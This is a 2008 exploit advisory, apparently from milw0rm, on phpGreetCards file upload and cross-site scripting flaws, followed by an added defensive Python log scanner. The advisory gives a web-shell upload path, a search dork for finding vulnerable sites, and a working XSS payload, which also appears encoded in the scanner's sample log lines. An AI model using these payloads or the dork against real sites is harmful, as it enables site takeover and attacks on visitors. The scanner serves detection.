phpGreetCards - Cross-Site Scripting / Arbitrary File Upload



EKU-ID: 15408 CVE: OSVDB-50989;CVE-2008-6849;OSVDB-50988;CVE-2008-6848 OSVDB-ID:
Author: ahmadbady Published: 2008-12-23 Verified: Verified


...................................................................................................

****(remote shell upload/xss)****

script: phpGreetCards

***************************************************************************
download from: http://www.w2b.ru/download/phpGreetCards.zip

***************************************************************************
www.site.com/path/index.php?mode=select&category

shell: www.site.com/path/userfiles/number_shell.php
-----------------------------------------------------------------------------------------
dork:"powered by phpGreetCards"

If the userfiles folder is forbidden:
after uploading the file, right-click the image and view its properties to see the file's address.

------------------------------------------------------------------------------------------
xss:
index.php?mode=select&category=>"><ScRiPt%20%0a%0d>alert(0)%3B</ScRiPt>
**************************************************


Author: ahmadbady

**************************************************

# milw0rm.com [2008-12-23]
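
For defenders checking web-server logs of a phpGreetCards install, the two request patterns in the advisory above (a script served from userfiles/, and markup in the category parameter of index.php?mode=select) can be flagged as below. This is an added example, not part of the original advisory or of phpGreetCards; the log format, the sample lines, the /cards/ path and the list of executable extensions are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache common log format; not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [23/Dec/2008:10:01:02 +0000] "GET /cards/index.php?mode=select&category=birthday HTTP/1.1" 200 5120
198.51.100.9 - - [23/Dec/2008:10:02:10 +0000] "GET /cards/index.php?mode=select&category=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(0)%3B%3C/ScRiPt%3E HTTP/1.1" 200 5301
198.51.100.9 - - [23/Dec/2008:10:03:44 +0000] "GET /cards/userfiles/1234_photo.jpg HTTP/1.1" 200 20480
198.51.100.9 - - [23/Dec/2008:10:04:05 +0000] "GET /cards/userfiles/5678_x.php HTTP/1.1" 200 312
203.0.113.4 - - [23/Dec/2008:10:05:00 +0000] "POST /cards/userfiles/9_a.PhP5?c=1 HTTP/1.1" 200 40
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# Assumption: extensions a typical PHP handler mapping would execute.
SCRIPT_EXT = re.compile(r"\.(?:php\d?|phtml|phar)$", re.IGNORECASE)
# Characters that have no place in a category name and can break out of HTML.
MARKUP = re.compile(r"[<>\"']")


def classify(line):
    """Return (client, status, finding, path) tuples for one log line."""
    m = REQUEST.match(line)
    if not m:
        return []
    client, target, status = m.group(1), m.group(2), int(m.group(3))
    parts = urlsplit(target)
    path = parts.path.lower()
    findings = []
    # The upload directory should only serve images; a script name is a red flag.
    if "/userfiles/" in path and SCRIPT_EXT.search(path):
        findings.append((client, status, "script-in-userfiles", parts.path))
    # parse_qs percent-decodes, so encoded and raw markup are treated alike.
    if path.endswith("/index.php"):
        query = parse_qs(parts.query, keep_blank_values=True)
        if query.get("mode") == ["select"] and any(
            MARKUP.search(v) for v in query.get("category", [])
        ):
            findings.append((client, status, "markup-in-category", parts.path))
    return findings


def scan(log_text):
    """Classify every line of a log and return all findings in order."""
    return [f for line in log_text.splitlines() for f in classify(line)]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

A 200 status on a script-in-userfiles finding means the server answered for that file, so the upload directory should be checked on disk and script execution disabled for it.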